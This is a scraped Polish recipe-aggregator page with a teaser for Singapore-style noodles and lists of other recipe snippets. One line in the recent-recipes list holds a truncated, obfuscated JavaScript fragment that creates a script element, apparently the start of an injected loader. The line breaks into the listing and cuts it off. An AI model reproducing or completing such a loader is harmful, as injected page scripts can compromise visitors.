Makaron po singapursku
Źródło: https://www.mecooks.pl/lunch/makaron-po-singapursku/
Makaron po singapursku czyli noodle ryżowe z dodatkiem przyprawy curry, drobiu, owoców morza oraz warzyw. Pomimo swojej nazwy danie to nie wywodzi się z Singapuru, a jest typowe dla kuchni chińskiej. Jest to danie stir-fry, czyli takie, w którym smażymy i mieszamy smażące się składniki. Cały proces odbywa się na dużym ogniu, dzięki czemu warzywa,… The post Makaron po singapursku appeared first on MeCooks Blog.
Najnowsze przepisy
(function(){ zz99=document.createElement("script");zz99_=("o ⇖ 16
Proste połączenie ale zdecydowanie zawsze się sprawdza.... ⇖ 31
Miodownik bez jajek – mięciutki, puszysty i pięknie... ⇖ 27
Pyszny przepis na noodle z mięsem mielonym. Szybki,... ⇖ 24
Wyobraź sobie ten moment: wyjmujesz z piekarnika idealną... ⇖ 15
Przepisy z bloga
Jajka po turecku to danie, którego koniecznie musicie... ⇖ 55
Ubita feta to puszysty i delikatny dip, który doskonale... ⇖ 56
Pyszny obiad bezmięsny czyli makaron z sosem z pieczonych... ⇖ 60
Maślane drożdżówki z serem ricotta i figami to wytrawny... ⇖ 91
Przepisy na czasie
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 358
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 267
Przepyszny domowy pasztet do smarowania. W sklepie tak... ⇖ 211
Paszteciki z mięsem, z ciasta drożdżowo-kruchego to... ⇖ 187
Tulipany do barszczyku to znakomita propozycja podania... ⇖ 171
Pyszny miodownik z kakaową masą grysikową i z orzechami... ⇖ 152
Idealne danie na ciepło na imprezy, lub na obiad. Przepis... ⇖ 71
Domowe pralinki są smaczne, łatwe do zrobienia i... ⇖ 67









































